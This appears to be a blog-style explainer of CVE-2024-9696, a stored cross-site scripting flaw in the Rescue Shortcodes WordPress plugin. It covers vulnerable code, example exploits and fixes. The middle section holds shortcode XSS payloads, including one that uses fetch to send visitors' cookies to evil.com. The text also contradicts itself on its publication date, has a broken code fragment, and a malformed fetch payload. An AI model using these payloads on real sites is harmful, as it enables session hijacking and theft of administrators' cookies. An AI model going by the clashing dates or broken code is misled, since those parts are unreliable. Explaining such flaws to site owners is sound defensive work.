CVE-2024-9696 - Exploiting Stored XSS in Rescue Shortcodes WordPress Plugin — Technical Deep Dive

On March 18, 2024, security researchers published details for a new vulnerability — CVE-2024-9696 — affecting the popular Rescue Shortcodes WordPress plugin. This vulnerability, which affects all versions up to and including 2.8, opens your site to Stored Cross-Site Scripting (XSS) attacks if you allow contributors to create or edit pages.

In this post, I’ll walk you through what CVE-2024-9696 is, why it’s dangerous, and how an attacker could exploit it, including code samples. I'll also show you ways to protect yourself.

What Is CVE-2024-9696? (Vulnerability Summary)

The Rescue Shortcodes plugin lets site builders use simple shortcodes to add custom content blocks, tabs, toggles, and more. The vulnerable part is the [rescue_tab] shortcode, which doesn’t properly sanitize user input, nor does it escape output in the generated HTML.

This means someone with contributor privileges (or higher) on your WordPress site can inject malicious JavaScript into any page or post using the [rescue_tab] shortcode. When a site visitor views the infected page, the JavaScript executes in *their* browser — easily stealing cookies, logging keystrokes, or hijacking sessions.

Suppose a legitimate [rescue_tab] shortcode looks like this

[rescue_tab title="About"]This is my about info.[/rescue_tab]

But because neither input (like title) nor output (in page HTML) are sanitized or escaped, a malicious contributor could inject JavaScript like this:

[rescue_tab title='About" onmouseover="alert(1)"']Malicious content[/rescue_tab]

That onmouseover attribute is a classic XSS vector: whenever a user hovers on the tab title, the alert(1) function is executed in their browser.

How It Gets Into HTML

Here’s a simplified (example) version of the relevant PHP code from the plugin (hypothetical, for illustration):

// File: rescue-shortcodes.php
function rescue_tab_shortcode($atts, $content = null) {
    // No escaping or sanitization!
    $title = $atts['title'];
    return '<div class="tab-title">' . $title . '</div>' .
           '<div class="tab-content">' . do_shortcode($content) . '</div>';
}
add_shortcode('rescue_tab', 'rescue_tab_shortcode');

A secure version should always use esc_html() or esc_attr() like this

$title = esc_html($atts['title']);

`wordpress

[rescue_tab title='Click me" onmouseover="alert(document.cookie)"']XSS![/rescue_tab]

Let’s see a practical attack

[rescue_tab title='Info" style="color:red;" onmouseover="fetch(https://evil.com?c=${document.cookie})"']Stealing cookies![/rescue_tab]

When an admin views the page, their browser sends cookies to the attacker’s server.

Impact

- Stored XSS: The script stays on your site, affecting all visitors to that page, not just the attacker.

How to Fix & Protect Yourself

1. Update immediately: If a patched version is available, update Rescue Shortcodes right away.
2. Sanitize and Escape: If maintaining your fork or can patch, modify code to sanitize input using esc_html() or esc_attr().
3. Restrict contributor privileges: Don’t let untrusted users have contributor/editor roles.
4. Use a security plugin: Tools like Wordfence or Sucuri can block malicious shortcodes.

References

- Official Plugin Page: Rescue Shortcodes
- WPScan Advisory for CVE-2024-9696
- NVD Entry for CVE-2024-9696
- Wordfence Security Blog

Conclusion

If you run a WordPress site with Rescue Shortcodes, CVE-2024-9696 means you need to act fast. Though this bug requires a logged-in user to exploit, any site with multiple contributors or editors could be at risk. Always sanitize user input, escape output, keep plugins updated, and audit your user roles.

Timeline

Published on: 10/12/2024 09:15:03 UTC
Last modified on: 10/15/2024 12:57:46 UTC